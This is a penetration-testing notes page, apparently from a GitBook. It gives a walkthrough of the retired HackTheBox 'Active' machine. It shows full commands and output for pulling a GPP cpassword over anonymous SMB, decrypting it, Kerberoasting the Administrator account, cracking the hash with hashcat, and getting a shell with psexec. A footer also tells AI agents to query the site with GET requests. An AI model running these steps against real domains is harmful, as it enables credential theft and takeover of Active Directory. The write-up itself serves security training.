> For the complete documentation index, see [llms.txt](https://csbygb.gitbook.io/pentips/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://csbygb.gitbook.io/pentips/windows/post-compromise-attack/gpp.md).
# GPP/cPassword Attacks
* GPP will keep passwords in an XML file
* Works with smb
* If we find a 334 open we can try to login anonymously *Example from HTB - Active - Retired Machine*
* Tips: `prompt off` (will not prompt when dl file) and `recurse on` (will list everything)
```
┌──(kali㉿kali)-[~]
└─$ smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
5217023 blocks of size 4096. 260455 blocks available
smb: \> prompt off
smb: \>
```
* We can get all the file using `mget *`
* We are interested in the group.xml file which has been downloaded in `active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/`\
* We can just copy cpassword and crackit using gpp-decrypt: `gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ` And we get the password: `GPPstillStandingStrong2k18`
## HTB - Active - privesc
* The password obtain with gpp only gave us user. To root the machine we use kerberoasting again:
```
┌──(kali㉿kali)-[~]
└─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40 2022-02-11 16:21:53
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$50b[STRIPPED]1
```
* We can then crack the password with hashcat
```
┌──(root💀kali)-[~/active-directory]
└─# hashcat -m 13100 hashkerb.txt /usr/share/wordlists/rockyou.txt -O
[STRIPPED]
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4[STRIPPED]1:Ticketmaster1968
```
* And finally get shell using psexec.py (Impacket)
```
┌──(root💀kali)-[~/active-directory]
└─# psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
```
## GPP - Resources
{% embed url="" %}
Group Policy Pwnage
{% endembed %}
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://csbygb.gitbook.io/pentips/windows/post-compromise-attack/gpp.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.